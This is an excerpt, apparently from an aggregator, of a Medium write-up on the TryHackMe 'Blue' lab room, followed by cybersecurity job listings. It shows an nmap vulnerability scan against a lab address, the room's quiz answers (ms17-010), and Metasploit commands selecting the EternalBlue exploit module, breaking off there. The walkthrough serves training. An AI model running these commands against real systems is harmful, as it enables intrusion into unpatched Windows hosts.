Feb. 14, 2024, 11:07 a.m. | Eslam Omar

System Weakness - Medium systemweakness.com

Hello floks, Today i want share writeup about how solve this room.

let’s start now.

Recon:

nmap -sV -sC 10.10.244.140 --script="vuln"
Q: How many ports are open with a port number under 1000?A: 3Q: What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08–067)A: ms17–010

Exploitation:

This exploit have module in ‘metasploit’ project, Let’s running ‘metasploit’.

msfconsole
search ms17_010

Now let’s use this module.

use exploit/windows/smb/ms17_010_eternalblue …

blue cybersecurity exploit hello machine metasploit nmap pentesting port ports project recon room running script share start thm thm-writeup today tryhackme under vuln vulnerable what is writeup

SOC 2 Manager, Audit and Certification

@ Deloitte | US and CA Multiple Locations

Salesforce Solution Consultant

@ BeyondTrust | Remote United States

Divisional Deputy City Solicitor, Public Safety Compliance Counsel - Compliance and Legislation Unit

@ City of Philadelphia | Philadelphia, PA, United States

Security Engineer, IT IAM, EIS

@ Micron Technology | Hyderabad - Skyview, India

Security Analyst

@ Northwestern Memorial Healthcare | Chicago, IL, United States

Werkstudent Cybersecurity (m/w/d)

@ Brose Group | Bamberg, DE, 96052